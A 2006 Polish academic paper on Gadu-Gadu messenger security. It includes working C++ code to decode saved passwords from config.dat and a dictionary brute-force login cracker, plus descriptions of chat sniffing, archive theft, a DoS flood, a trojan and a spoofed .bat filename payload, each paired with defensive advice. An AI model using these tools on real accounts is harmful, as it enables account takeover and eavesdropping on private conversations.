Bezpieczeństwo komunikatorów sieciowych na przykładzie komunikatora Gadu-Gadu

Wielkość: px
Rozpocząć pokaz od strony:

Download "Bezpieczeństwo komunikatorów sieciowych na przykładzie komunikatora Gadu-Gadu"

Transkrypt

1 Bezpieczeństwo komunikatorów sieciowych na przykładzie komunikatora Gadu-Gadu 1. Historia rozwoju Gadu-Gadu jest pierwszym polskim programem, umożliwiającym komunikacje w Internecie wykorzystującym technologię Instant Messaging. Sama idea Gadu-Gadu powstała 6 lat temu, a jej pomysłodawcą był Łukasz Foltyna. 15 sierpnia 2000 oficjalnie wystartowało Gadu-Gadu i już w dniu startu uzyskało 10 tysięcy użytkowników. Po roku pracy liczba ta wzrosła do 250 tysięcy osób. Wraz ze wzrostem liczby użytkowników rosła również liczba wiadomości wysyłanych przez komunikator. Od początku istnienia Gadu-Gadu do dzisiaj wzrosła ona 100-krotnie - z niespełna 3 do 300 milionów wiadomości wysyłanych dziennie. Szacuje się, że z tego komunikatora korzysta obecnie około 5 milionów internautów. Gadu-Gadu stało się w Polsce ważną formą komunikacji. Tak duża popularność tej aplikacji niesie ze sobą wiele niebezpieczeństw dla jej użytkowników, którzy są często nieświadomi tego zagrożenia. 2. Podstawy działania Komunikator w czasie wymiany informacji wykorzystuje sieć serwerów, z którymi wymienia dane za pomocą protokołu TCP/IP. Każdy przesyłany pakiet zawiera na początku dwa stałe pola: Struct gg_header ; int type; int length; // Typ pakietu // Długość reszty pakietu Wszystkie zmienne liczbowe są zgodne z kolejnością bajtów maszyn Intela, czyli Little-Endian. Wszystkie teksty są kodowane przy użyciu zestawu znaków CP1250. IP serwera, z którym łączy się klient można uzyskać za pomocą HTTP, łącząc się z appmsg.gadu-gadu.pl i przesyłając informacje postaci: GET/appsvc/appmsg4.asp?fmnumber=NUMER&version=WERSJA&fmt=FORMA T&lastmsg=WIADOMOŚĆ Accept: image/gif, image/jpeg, image/pjpeg, 1

2 Accept-Language: pl User-Agent: PRZEGLĄDARKA Pragma: no-cache Host: appmsg.gadu-gadu.pl NUMER to numer Gadu-Gadu, WERSJA jest wersją klienta, FORMAT określa czy wiadomość przesyłana była czystym tekstem (brak zmiennej ftm ) czy też w HTML-u (wartość 2), WIADOMOŚĆ jest numerem ostatnio otrzymanej wiadomości systemowej. Serwery gg nasłuchują na porcie 8074 (lub ewentualnie 443). Dalsze istotne szczegóły komunikacji i niebezpieczeństwa z nimi związane zostaną opisane w dalszej części dokumentu. 3.Włamania Plik config.dat Każdy użytkownik Gadu-Gadu w momencie tworzenia własnego konta otrzymuje unikalny numer, który identyfikuje konto internauty. Dostęp do tego konta strzeżony jest przez hasło, ustalane przez użytkownika. Komunikator posiada opcję zapamiętywania hasła. Po wybraniu tej opcji, hasło zapisywane jest w pliku config.dat. Ten plik znajduje się w Windows 95, 98, Me w katalogu z instalacją GG najczęściej C:\Program Files\Gadu-Gadu w folderze użytkownika. W Windows 2000, 2003, XP zapisany jest przeważnie w katalogu: C:\Documents and Settings\[nazwa użytkownika Windows]\Gadu-Gadu\. Po otwarciu tego pliku za pomocą dowolnego edytora tekstu możemy odczytać z niego bezpośrednio wiele informacji na temat ustawień konta danego internauty m.in. takich jak opisy czy też dźwięki używane w czasie pracy programu. Okazuje się, że w łatwy sposób można odzyskać z niego także hasło użytkownika (o ile oczywiście poprosił o jego zapis). W każdym pliku config.dat po napisie Password2 aplikacja zapisuje nasze hasło w zakodowanej postaci. Trzeba przyznać, że twórcy komunikatora nie zadbali o jakość algorytmu kodującego. Po kilku zmianach hasła łatwo odczytać ten algorytm. Długość zakodowanego hasła jest równa podwojonej długości prawdziwego hasła. Podwojenie długości wynika z faktu, że po każdym zakodowanym znaku występuje duża litera określająca jego przynależność do odpowiedniej grupy. Cyfry są oznaczane literą D, litery od a do o literą G, litery od p do z literą H, litery od A do O literą E, litery od P do Z literą F. Cyfry od zera do dziewięciu odpowiadają odpowiednio literom z alfabetu: od A do J, a w haśle odpowiada B w pliku itd. do o, p w haśle odpowiada B w pliku itd. do z (analogicznie kodowane są duże litery). Oto kod C++ prostego programu mojego autorstwa implementujący ten algorytm: 2

3 #include <iostream> #include <string> using namespace std; int main(int argc, char**argv) if(argc!=2) cout<<"error. Incorrect number of parameters!"; return 1; string pas = ""; for(int i=0;i<strlen(argv[1]);i++) if(i%2) if(argv[1][i]=='d') pas += (char)((unsigned int)(argv[1][i-1])-17); else if(argv[1][i] == 'G') pas += (char)((unsigned int)(argv[1][i-1])+31); else if(argv[1][i] == 'H') pas += (char)((unsigned int)(argv[1][i-1])+47); cout<<"the password is "<<pas; return 1; Powyższy problem posiada łatwe rozwiązanie. Nie należy po prostu korzystać z opcji zapamiętaj hasło oferowanej przez program. Jeśli jednak decydujemy się na ten krok, to postarajmy się zabezpieczyć komputer (firewall, program antywirusowy, hasło na biosie, itp.) i utrudnić dostęp do naszych danych obcym osobom. Brute force W większości przypadków hasła, które tworzymy są krótkie i złożone z prostych słów powiązanych często z imionami, nazwiskami, numerami telefonów itd.. Hasła takie są bardzo łatwe do złamania atakami typy brute force. Jest to rodzaj algorytmu, który polega na rozpatrzeniu wszystkich przypadków po kolei (w naszym przypadku jest to podjęcie prób zalogowania się na konto danej osoby przy użyciu kolejnych kombinacji hasła). Do algorytmów typu brute force zaliczamy tzw. ataki słownikowe (dictionary attacks), które wykorzystują słownik haseł, czyli zbiór przygotowany przez atakującego np. wszystkich możliwych kryptogramów powstałych z zaszyfrowania występujących w tekście jawnym fragmentów wszystkimi możliwymi kluczami. Wszystko czego potrzebujemy do podjęcia próby tego typu to : linux, biblioteka libgadu, większy słownik oraz przekompilowany poniższy kod: 3

4 #include <stdio.h> #include <stdlib.h> #include <string.h> #include <errno.h> #include "libgadu.h" #include <unistd.h> #include <iostream> #include <fstream> using namespace std; int main(int argc, char **argv) struct gg_session *sess; struct gg_event *e; struct gg_login_params p; if (argc < 3) std::cout<<"usage: <uin> <password_file> \n"; return 0; gg_debug_level = 0; memset(&p, 0, sizeof(p)); p.uin = atoi(argv[1]); char buffer[500]; ifstream INFILE(argv[2], ios::in); if(!infile) cerr<<"dictionary could not be opened"<<endl; exit(1); while (!INFILE.eof()) INFILE.getline(buffer, sizeof(buffer)); p.password = buffer; cout<<"\n NEXT: "; cout<<p.password; if(sess = gg_login(&p)) cout<<"\n\n WE HAVE PASSWORD!!!!! : "<<p.password << " \n\n" ; gg_logoff(sess); gg_free_session(sess); return 0; cout<<"\n failed to crack the password :( \n "; gg_free_session(sess); return 0; Słowniki możemy znaleźć bez problemów w sieci. Wystarczy poszukać ich za pomocą wyszukiwarki Google pod hasłem Wordlist. Oczywiście skuteczność ataku jest uzależniona od samego hasła. Im jest ono dłuższe i bardziej złożone, tym trudniej je złamać. 4

5 Jak się bronić przed takimi atakami? Bardzo prosto. Wystarczy tworząc hasło pamiętać o następujących zasadach: o Hasło nie może znajdować się w żadnym słowniku - najlepiej takie, które daje zero wyników w Google. o Nie może być typu: login1, pseudonim1 lub imię1 (lub inna cyfra na końcu) 4. Podsłuchiwanie Największym problemem w podsłuchiwaniu rozmów innych użytkowników Gadu-Gadu jest przechwycenie krążących w sieci pakietów. W słabo zabezpieczonych sieciach lokalnych sprawa znacznie się upraszcza. Jeżeli architektura sieci opiera się na modelu magistrali (np. Ethernet, połączony kablem koncentrycznym), to pakiet z komputera A do Z biegnie przez wszystkie komputery B-Y. Każdy z tych komputerów może podsłuchać transmisję danych. Wystarczy zmienić tryb pracy karty sieciowej na promiscuous mode i skorzystać z odpowiedniego oprogramowania. Okazuje się, że sama rozmowa za pomocą komunikatora Gadu-Gadu nie jest kodowana więc przychwycenie pakietów umożliwia łatwe podsłuchiwanie rozmowy. Aby to sprawdzić wystarczy użyć programu Ethereal. Po ustawieniu Capture Filter na tcp dst port 8074 odczytywałem bezpośrednio informacje wysyłane za pomocą komunikatora. Wiadomości wysyłane są w następującej postaci: struct gg_send_msg int recipient; int seq; int class; char message[]; /* numer odbiorcy /* numer sekwencyjny /* klasa wiadomości /* treść ; Numer sekwencyjny jest wykorzystywany przy potwierdzeniu dostarczenia lub zakolejkowania pakietu. Nie jest wykluczone, że w jakiś sposób odróżnia się różne rozmowy za pomocą części bajtów. Klasa wiadomości pozwala odróżnić, czy wiadomość ma się pojawić w osobnym okienku czy jako kolejna linijka w okienku rozmowy. Długość treści wiadomości nie powinna przekraczać 2000 znaków. Oryginalny klient zezwala na wysłanie do 1989 znaków. Jeśli uzyskamy już dostęp do pakietów innych użytkowników sieci to oprócz szpiegowania rozmów możemy podjąć także próbę włamania się na ich konta. Problem sprowadza się do odczytania przechwyconego pakietu z hasłem użytkownika. Mimo, iż połączenie nie jest kodowane, to sam Ethereal już nie wystarcza, aby odczytać bezpośrednio dane. Trzeba przyznać, że w tym przypadku autorzy Gadu-Gadu postarali się o znacznie większe bezpieczeństwo. Po połączeniu się portem 8074 lub 443 serwera Gadu-Gadu, otrzymujemy pakiet typu 0x0001. Reszta pakietu zawiera liczbę, na podstawie której liczony jest hash z hasła klienta: 5

6 struct gg_welcome int seed; ; /* klucz szyfrowania hasła Odpowiedź przesyłana jest w postaci: struct gg_login int uin; /* mój numer int hash; /* hash hasła int status; /* status na dzień dobry int version; /* moja wersja klienta char unknown1; /* 0x00 int local_ip; /* mój adres ip short local_port; /* port, na którym słucham int external_ip; /* zewnętrzny adres ip short external_port; /* zewnętrzny port char image_size; /* maksymalny rozmiar grafiki w KB char unknown2; /* 0xbe char description[]; /* opis, nie musi wystąpić int time; /* czas, nie musi wystąpić ; Zastosowanie funkcji haszującej znacznie utrudnia przechwycenie hasła. Funkcja ta jest powszechnie dostępna w sieci, ale złamanie jej nie jest proste. Oto kod funkcji haszującej Gadu-Gadu 6.0: int gg_login_hash(unsigned char *password, unsigned int seed) unsigned int x, y, z; y = seed; for (x = 0; *password; password++) x = (x & 0xffffff00) *password; y ^= x; y += x; x <<= 8; y ^= x; x <<= 8; y -= x; x <<= 8; y ^= x; z = y & 0x1f; y = (y << z) (y >>(32 - z)); return y; Dobrze zabezpieczona sieć może w dużym stopniu zmniejszyć ryzyko podsłuchu. Użytkownicy, jednak nie powinni przesyłać komunikatorem cennych informacji, ze względu na brak szyfrowanego połączenia. 6

7 5. Odczytywanie archiwum rozmów Archives.dat Komunikator Gadu-Gadu posiada opcję zapisywania rozmów użytkowników. Wszystkie dane archiwizowane są w pliku archives.dat. Plik ten jest umieszczony w tym samym katalogu, co wcześniej wspomniany plik konfiguracyjny config.dat. Plik archives.dat złożony jest z kilku podstawowych części: nagłówka, indeksu i sekcji danych. Samo archiwum pod względem logicznym jest podzielone na sekcje. Nagłówek jest umieszczony jak się łatwo domyślić na samym początku i zawiera to co zwykle zawierają nagłówki - sumę kontrolną, numer gg właściciela, offsety do pozostałych części pliku, itp.. W indeksie zapisane są nagłówki poszczególnych sekcji. Same sekcje zapisane są w postaci list bloków. W nagłówku sekcji zapisany jest offset do pierwszego bloku (oraz ilość bloków), a w każdym bloku zapisany jest offset do następnego bloku (o ile istnieje). Bloki z kolei zawierają nagłówki wiadomości, które z kolei zawierają wskaźniki do samych wiadomości (które też zawierają dodatkowe informacje). Wszystkie wartości liczbowe zapisane są w formie "Little-Endian" (czyli standardowej dla procesorów x86). Nagłówek Offset Rozmiar Opis 0x00 4 bajty string RC03 0x04 4 bajty wynosi 1 0x08 4 bajty offset indeksu w pliku 0x0C 4 bajty rozmiar indeksu (w bajtach) 0x10 4 bajty rozmiar całego pliku (po co?) 0x14 4 bajty offset sekcji danych w pliku 0x18 12 bajtów x24 4 bajty UIN właściciela XOR 0xFFFFFD66 0x28 4 bajty suma kontrolna 0x2C - koniec Na podstawie pola UIN klient GG sprawdza czy importowane archiwum należy do nas. Suma kontrolna liczona jest standardowym algorytmem CRC-32 7

8 z bajtów od początku pliku do początku sekcji danych (określony przez pole 0x14 w nagłówku). Przy liczeniu CRC za zawartość pola sumy kontrolnej (0x28) przyjmuje się 0. Nagłówek bloku Offset Rozmiar Opis 0x00 4 bajty numer sekcji 0x04 4 bajty ilość bloków tworzących sekcję 0x08 4 bajty offset do pierwszego bloku 0x0C 8 bajtów prawdopodobnie informacje ilości zajętego miejsca 0x14 - koniec Suma kontrolna to znów CRC-32 - tym razem wczytuje od 4 bajtu bloku (czyli tuż za samą sumą) aż do końca bloku (jego długość zapisana jest w polu 0x08). Numer sekcji powinien się zgadzać z numerem sekcji którą tworzy ten blok. Blok Offset Rozmiar Opis 0x00 4 bajty suma kontrolna 0x04 4 bajty numer sekcji 0x08 4 bajty długość bloku (w bajtach) 0x0C 4 bajty offset do następnego bloku 0x10 4 bajty ilość danych w bloku (w bajtach) 0x14 - koniec - W tym przypadku zwykła edycja pliku archives.dat nie pozwala na uzyskanie jakichkolwiek informacji. Oczywiście można by podjąć próbę opracowania programu odczytującego dane z tego pliku, jednak okazuje się to być zupełnie niepotrzebne. Autorzy komunikatora sami przychodzą nam z pomocą. Wprawdzie bez znajomości hasła danego użytkownika nie możemy odczytać jego archiwum, ale tworząc zupełnie nowe konto i podmieniając pliki z archiwami, uzyskujemy pełny dostęp do rozmów szpiegowanej osoby. Jedynym minusem jest fakt, że przeglądane rozmowy są wyświetlane w przypadkowej 8

9 kolejności. Komunikator pozwala także modyfikować własne archiwum. Usunięte rozmowy można ławo odzyskać za pomocą wielu darmowych programów takich jak chociażby ggundel. Jednym z rozwiązań tego problemu jest wyłączenie opcji tworzenia archiwum. Jeśli jednak już decydujemy się na archiwizacje danych to musimy zabezpieczyć odpowiednio plik archives.dat, tak aby nie dostał się w niepowołane ręce. 6. Atak DoS Wykorzystując atak DoS możemy w łatwy sposób zablokować na krótki okres komunikator Gadu-Gadu innej osoby. Wystarczy napisać prostą aplikację, która za pomocą protokołu TCP/IP zaloguje się na nowo utworzone konto. Sam mechanizm logowania został opisany wcześniej, więc przedstawię go tylko w skrócie. Po połączeniu się portem 8074 lub 443 serwera Gadu-Gadu, otrzymujemy liczbę do obliczenia hasha hasła. Hash naszego hasła obliczony przez funkcje gg_login_hash(unsigned char *password, unsigned int seed) wysyłamy do serwera w postaci struct gg_login. Po uzyskaniu połączenia wystarczy zasypać ofiarę dużą liczbą emotek (np. 100 pakietów po 120 emotek). Gadu-Gadu wywiesza się po otrzymaniu takich informacji. Nawet najnowsza wersja aplikacji nie radzi sobie z tym atakiem. Co ciekawe ataku nie można przeprowadzać kolejny raz z tego samego konta (przynajmniej przez dłuższy okres czasu), ponieważ konto użytkownika, z którego przeprowadzony został atak zostaje zablokowane. Najłatwiejszą obroną przed taką formą ataku jest zablokowanie odbierania informacji od nieznajomych. 7. Trojany Mechanizmy komunikacji wykorzystywane przez Gadu-Gadu zostały szybko wykorzystane przez hakerów do łatwego pisania trojanów. Zasady działania tych złośliwych aplikacji są bardzo proste. Trojan działający na komputerze ofiary zachowuje się analogicznie jak aplikacja Gadu-Gadu. Komunikuje się on z hakerem wykorzystując te same porty co Gadu-Gadu i wysyłając identyczne pakiety. Firewalle często mają problemy z odróżnieniem złośliwych programów od komunikatora. Znalezienie takich trajanów w sieci i ich konfiguracja nie stanowią żadnych problemów. Najczęściej wystarczy zaledwie stworzyć nowe konto na Gadu-Gadu i umieścić wirusa na komputerze ofiary. Sterowanie takim wirusem sprowadza się wyłącznie do wpisywania 9

10 ciągu odpowiednich poleceń na okienku komunikatora. Na stronie możemy znaleźć cały pakiet służący do generacji podobnych trojanów i szczegółowe jego opisy. Testowany przeze mnie Gadu-Ghost Trojan na szczęście jest wykrywany przez większość programów antywirusowych takich jak NOD32 (jest on napisany na bazie innego trojana). Sam wirus jest bardzo rozbudowany i pozwala np. prowadzić rozmowę z ofiarą, wysyłać pliki za pomocą ftp, zarządzać procesami systemowymi komputera na którym pasożytuje. W celu zabezpieczenia się przed podobnymi atakami użytkownik powinien zainstalować na swoim komputerze dobry firewall i program antywirusowy. Należy unikać także uruchamiania plików pochodzących z nieznanych źródeł. 8.Wirtualna tożsamość Okazuje się, że Gadu-Gadu jest doskonałym narzędziem uzyskiwania numerów IP internautów używających tego komunikatora. Najnowsza wersja Gadu-Gadu posiada plugin automatycznie wykrywający numer IP osób dostępnych na liście kontaktów. W starszych wersjach wystarczy zainstalowanie wtyczki Inwigilator do PowerGG lub użycie innego kilenta GG, np. Konnekt lub Kadu (dla Linuxa). Komunikator posiada także opcję wymiany plików między użytkownikami. Aby nawiązać połączenie p2p osoba do której wysyłamy plik musi mieć nas na swojej liście kontaktów i ustawić status na dostępny. Po nawiązaniu połączenia wystarczy uruchomić Start -> Uruchom -> cmd -> netstat i wyszukać interesującą nas informacje. Możemy również skorzystać z dowolnego programu śledzącego w systemie połączenia np. proport. 9. Inne błędy Mimo dużej troski twórców komunikatora Gadu-Gadu o bezpieczeństwo użytkownika, w coraz to nowszych wersjach tej aplikacji internauci doszukują się kolejnych błędów. Oto kilka ciekawszych przykładów. Wersja 4.0 pozwalała na wykonywanie kodu javascript w strefie lokalnej poprzez wysłanie odpowiednio przygotowanej wiadomości. Wiadomość postaci: 407.php','','left=10000'));".pl wywoływała aplet instalujący trojana na komputerze ofiary. Wersja build 155 umożliwiała wykonanie prostego ataku DoS. Program zawierał nową pętle sprawdzającą nazwę przesyłanych plików, chroniąc przed niebezpiecznymi znakami. Niestety pętla w pewnych przypadkach nie zatrzymywała się (gdy nazwa pliku graficznego nie zaczyna się jednym z poniższych znaków: '..', '/', '\' lub '&#' ). 10

11 Jedna z wersji klienta Gadu-Gadu pozwalała na ukrycie nazwy przesyłanego pliku. Podobny błąd zaobserwowano w przeglądarce Internet Explorer, gdzie można było przekazać użytkownikowi odpowiednio sformatowany adresu URL przekierowujący go na wybrany adres serwera. Pod nazwą: pic.jpg%20(228%20kb)%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.bat użytkownik Gadu-Gadu zamiast pliku z rozszerzeniem jpg otwierał plik typu bat. Lista podobnych błędów jest znacznie dłuższa. Na szczęście są one na bieżąco usuwane. W wersji 7.0 żadna z opisanych nieprawidłowości już dawno nie występuje. Z tego powodu użytkownik powinien starać się używać w miarę najnowszych wersji komunikatora. Kraków 2006 Krzysztof Wojnarowicz Instytut Informatyki UJ Bibliografia:

WINDOWS Instalacja serwera WWW na systemie Windows XP, 7, 8.

WINDOWS Instalacja serwera WWW na systemie Windows XP, 7, 8. WINDOWS Instalacja serwera WWW na systemie Windows XP, 7, 8. Gdy już posiadamy serwer i zainstalowany na nim system Windows XP, 7 lub 8 postawienie na nim serwera stron WWW jest bardzo proste. Wystarczy

Bardziej szczegółowo

Usługi sieciowe systemu Linux

Usługi sieciowe systemu Linux Usługi sieciowe systemu Linux 1. Serwer WWW Najpopularniejszym serwerem WWW jest Apache, dostępny dla wielu platform i rozprowadzany w pakietach httpd. Serwer Apache bardzo często jest wykorzystywany do

Bardziej szczegółowo

Metody zabezpieczania transmisji w sieci Ethernet

Metody zabezpieczania transmisji w sieci Ethernet Metody zabezpieczania transmisji w sieci Ethernet na przykładzie protokołu PPTP Paweł Pokrywka Plan prezentacji Założenia Cele Problemy i ich rozwiązania Rozwiązanie ogólne i jego omówienie Założenia Sieć

Bardziej szczegółowo

- w firmie AGD, w komputerze używanym przez sekretarkę oraz trzech akwizytorów stwierdzono usterkę systemu komputerowego,

- w firmie AGD, w komputerze używanym przez sekretarkę oraz trzech akwizytorów stwierdzono usterkę systemu komputerowego, 1. Projekt realizacji prac prowadzących do zlokalizowania i usunięcia usterek systemu komputerowego, w zakresie diagnozowania wstępnego, ustalenia przyczyn usterek i usunięcia usterek. 2. Założenia do

Bardziej szczegółowo

Dostęp do systemu CliniNET ver. 1.0

Dostęp do systemu CliniNET ver. 1.0 ver. 1.0 24 lutego 2012 Spis treści 1 Informacje ogólne 1 2 Instalacja oprogramowania 3 3 Pierwsze logowanie 5 4 Wyszukiwanie informacji o pacjentach 9 5 Pytania i odpowiedzi 12 1 Informacje ogólne Niniejszy

Bardziej szczegółowo

Technologie sieciowe Sprawozdanie z labolatorium. Lista 5

Technologie sieciowe Sprawozdanie z labolatorium. Lista 5 Politechnika Wrocławska Wydział Podstawowych Problemów Techniki Technologie sieciowe Sprawozdanie z labolatorium Lista 5 Autor: Piotr Kosytorz IIrokInf. indeks: 166174 Prowadzący: dr inż. Łukasz Krzywiecki

Bardziej szczegółowo

System Kancelaris. Zdalny dostęp do danych

System Kancelaris. Zdalny dostęp do danych Kancelaris krok po kroku System Kancelaris Zdalny dostęp do danych Data modyfikacji: 2008-07-10 Z czego składaj adają się systemy informatyczne? System Kancelaris składa się z dwóch części: danych oprogramowania,

Bardziej szczegółowo

1. Konfiguracja sieciowa 3. 2. Konfiguracja 6. 3. Konfiguracja podstawowa 7. 4. Zamykanie aplikacji 9. 5. Lista adresów stron dozwolonych 10

1. Konfiguracja sieciowa 3. 2. Konfiguracja 6. 3. Konfiguracja podstawowa 7. 4. Zamykanie aplikacji 9. 5. Lista adresów stron dozwolonych 10 Program Motyl Instrukcja konfiguracji programu 1 Spis treści Str. 1. Konfiguracja sieciowa 3 2. Konfiguracja 6 3. Konfiguracja podstawowa 7 4. Zamykanie aplikacji 9 5. Lista adresów stron dozwolonych 10

Bardziej szczegółowo

PORADNIK KORZYSTANIA Z SERWERA FTP ftp.architekturaibiznes.com.pl

PORADNIK KORZYSTANIA Z SERWERA FTP ftp.architekturaibiznes.com.pl PORADNIK KORZYSTANIA Z SERWERA FTP ftp.architekturaibiznes.com.pl Do połączenia z serwerem A&B w celu załadowania lub pobrania materiałów można wykorzystać dowolny program typu "klient FTP". Jeżeli nie

Bardziej szczegółowo

PROBLEMY TECHNICZNE. Co zrobić, gdy natrafię na problemy związane z użytkowaniem programu DYSONANS

PROBLEMY TECHNICZNE. Co zrobić, gdy natrafię na problemy związane z użytkowaniem programu DYSONANS PROBLEMY TECHNICZNE Co zrobić, gdy natrafię na problemy związane z użytkowaniem programu DYSONANS Jeżeli stwierdziłeś występowanie błędów lub problemów podczas pracy z programem DYSONANS możesz skorzystać

Bardziej szczegółowo

PROGRAMY NARZĘDZIOWE 1

PROGRAMY NARZĘDZIOWE 1 PROGRAMY NARZĘDZIOWE 1 Kompresja plików Pojęcie kompresji i dekompresji Kompresja plików polega na zmniejszenie rozmiaru pliku na dysku. Potocznie nazywa się to pakowaniem. Jej odwrotnością jest dekompresja

Bardziej szczegółowo

ZPKSoft WDoradca. 1. Wstęp 2. Architektura 3. Instalacja 4. Konfiguracja 5. Jak to działa 6. Licencja

ZPKSoft WDoradca. 1. Wstęp 2. Architektura 3. Instalacja 4. Konfiguracja 5. Jak to działa 6. Licencja ZPKSoft WDoradca 1. Wstęp 2. Architektura 3. Instalacja 4. Konfiguracja 5. Jak to działa 6. Licencja 1. Wstęp ZPKSoft WDoradca jest technologią dostępu przeglądarkowego do zasobów systemu ZPKSoft Doradca.

Bardziej szczegółowo

Gatesms.eu Mobilne Rozwiązania dla biznesu

Gatesms.eu Mobilne Rozwiązania dla biznesu Mobilne Rozwiązania dla biznesu SPECYFIKACJA TECHNICZNA WEB API-USSD GATESMS.EU wersja 0.9 Opracował: Gatesms.eu Spis Historia wersji dokumentu...3 Bezpieczeństwo...3 Wymagania ogólne...3 Mechanizm zabezpieczenia

Bardziej szczegółowo

Memeo Instant Backup Podręcznik Szybkiego Startu

Memeo Instant Backup Podręcznik Szybkiego Startu Wprowadzenie Memeo Instant Backup pozwala w łatwy sposób chronić dane przed zagrożeniami cyfrowego świata. Aplikacja regularnie i automatycznie tworzy kopie zapasowe ważnych plików znajdujących się na

Bardziej szczegółowo

Trojan bankowy Emotet w wersji DGA

Trojan bankowy Emotet w wersji DGA Trojan bankowy Emotet w wersji DGA Warszawa 17/11/2014 CERT Orange Polska Strona 1 z 7 Trojan bankowy Emotet został zauważony kilka miesięcy temu. Od tej pory zdaje się być cyklicznie wykorzystywany w

Bardziej szczegółowo

Zestaw ten opiera się na pakietach co oznacza, że dane podczas wysyłania są dzielone na niewielkie porcje. Wojciech Śleziak

Zestaw ten opiera się na pakietach co oznacza, że dane podczas wysyłania są dzielone na niewielkie porcje. Wojciech Śleziak Protokół TCP/IP Protokół TCP/IP (Transmission Control Protokol/Internet Protokol) to zestaw trzech protokołów: IP (Internet Protokol), TCP (Transmission Control Protokol), UDP (Universal Datagram Protokol).

Bardziej szczegółowo

Protokoły zdalnego logowania Telnet i SSH

Protokoły zdalnego logowania Telnet i SSH Protokoły zdalnego logowania Telnet i SSH Krzysztof Maćkowiak Wprowadzenie Wykorzystując Internet mamy możliwość uzyskania dostępu do komputera w odległej sieci z wykorzystaniem swojego komputera, który

Bardziej szczegółowo

Instrukcja pobrania i zainstalowania elektronicznego certyfikatu Generali PPF Online Plus - Microsoft Internet Explorer

Instrukcja pobrania i zainstalowania elektronicznego certyfikatu Generali PPF Online Plus - Microsoft Internet Explorer Instrukcja pobrania i zainstalowania elektronicznego certyfikatu Generali PPF Online Plus - Microsoft Internet Explorer Spis treści Pobranie i instalacja... Chyba! Záložka není definována. Zalogowanie

Bardziej szczegółowo

SIP Studia Podyplomowe Ćwiczenie laboratoryjne Instrukcja

SIP Studia Podyplomowe Ćwiczenie laboratoryjne Instrukcja SIP Studia Podyplomowe Ćwiczenie laboratoryjne Instrukcja Instytut Telekomunikacji Wydział Elektroniki i Technik Informacyjnych Politechnika Warszawska, marzec 2015 Wprowadzenie Ćwiczenie jest wykonywane

Bardziej szczegółowo

Internetowy serwis Era mail Aplikacja sieci Web

Internetowy serwis Era mail Aplikacja sieci Web Internetowy serwis Era mail Aplikacja sieci Web (www.login.eramail.pl) INSTRUKCJA OBSŁUGI Spis treści Internetowy serwis Era mail dostępny przez komputer z podłączeniem do Internetu (aplikacja sieci Web)

Bardziej szczegółowo

Nr: 12. Tytuł: UDOSTĘPNIANIE DANYCH O SPRAWACH KLIENTOM KANCELARII NA ZEWNĘTRZNYCH SERWERACH WWW. Data modyfikacji: 2012-03-08

Nr: 12. Tytuł: UDOSTĘPNIANIE DANYCH O SPRAWACH KLIENTOM KANCELARII NA ZEWNĘTRZNYCH SERWERACH WWW. Data modyfikacji: 2012-03-08 Nr: 12 Tytuł: UDOSTĘPNIANIE DANYCH O SPRAWACH KLIENTOM KANCELARII NA ZEWNĘTRZNYCH SERWERACH WWW Data modyfikacji: 2012-03-08 Co zawiera ten dokument: Ten dokument zawiera informacje o możliwościach i sposobie

Bardziej szczegółowo

Instalacja protokołu PPPoE

Instalacja protokołu PPPoE Instalacja protokołu PPPoE Uruchomienie PPPoE w systemie Windows XP za pomocą wbudowanego kreatora Uruchomienie PPPoE w systemach z rodziny Windows 98 Instrukcja oparta na powszechnie dostępnych w Internecie

Bardziej szczegółowo

4. Podstawowa konfiguracja

4. Podstawowa konfiguracja 4. Podstawowa konfiguracja Po pierwszym zalogowaniu się do urządzenia należy zweryfikować poprawność licencji. Można to zrobić na jednym z widżetów panelu kontrolnego. Wstępną konfigurację można podzielić

Bardziej szczegółowo

Komunikator internetowy w C#

Komunikator internetowy w C# PAŃSTWOWA WYśSZA SZKOŁA ZAWODOWA W ELBLĄGU INSTYTUT INFORMATYKI STOSOWANEJ Sprawozdanie Komunikator internetowy w C# autor: Artur Domachowski Elbląg, 2009 r. Komunikacja przy uŝyciu poczty internetowej

Bardziej szczegółowo

KOMPUTEROWY SYSTEM WSPOMAGANIA OBSŁUGI JEDNOSTEK SŁUŻBY ZDROWIA KS-SOMED

KOMPUTEROWY SYSTEM WSPOMAGANIA OBSŁUGI JEDNOSTEK SŁUŻBY ZDROWIA KS-SOMED KOMPUTEROWY SYSTEM WSPOMAGANIA OBSŁUGI JEDNOSTEK SŁUŻBY ZDROWIA KS-SOMED Podręcznik użytkownika Katowice 2010 Producent programu: KAMSOFT S.A. ul. 1 Maja 133 40-235 Katowice Telefon: (0-32) 209-07-05 Fax:

Bardziej szczegółowo

Problemy z bezpieczeństwem w sieci lokalnej

Problemy z bezpieczeństwem w sieci lokalnej Problemy z bezpieczeństwem w sieci lokalnej możliwości podsłuchiwania/przechwytywania ruchu sieciowego pakiet dsniff demonstracja kilku narzędzi z pakietu dsniff metody przeciwdziałania Podsłuchiwanie

Bardziej szczegółowo

World Wide Web? rkijanka

World Wide Web? rkijanka World Wide Web? rkijanka World Wide Web? globalny, interaktywny, dynamiczny, wieloplatformowy, rozproszony, graficzny, hipertekstowy - system informacyjny, działający na bazie Internetu. 1.Sieć WWW jest

Bardziej szczegółowo

Jakie nowości i udogodnienia niesie za sobą przejście do Sidoma 8, część z tych różnic znajdziecie Państwo w tabeli poniżej.

Jakie nowości i udogodnienia niesie za sobą przejście do Sidoma 8, część z tych różnic znajdziecie Państwo w tabeli poniżej. Instrukcja generowania klucza dostępowego do SidomaOnLine 8 Szanowni Państwo! Przekazujemy nową wersję systemu SidomaOnLine 8. W celu zalogowania się do systemu niezbędny jest nowy klucz dostępu, a niniejsza

Bardziej szczegółowo

- w związku ze stwierdzoną usterką właściciel firmy wezwał serwis komputerowy w celu jej zdiagnozowania i usunięcia,

- w związku ze stwierdzoną usterką właściciel firmy wezwał serwis komputerowy w celu jej zdiagnozowania i usunięcia, 1. Projekt realizacji prac prowadzących do zlokalizowania i usunięcia usterek systemu komputerowego, w zakresie diagnozowania wstępnego, ustalenia przyczyn usterek i usunięcia usterek. 2. Założenia do

Bardziej szczegółowo

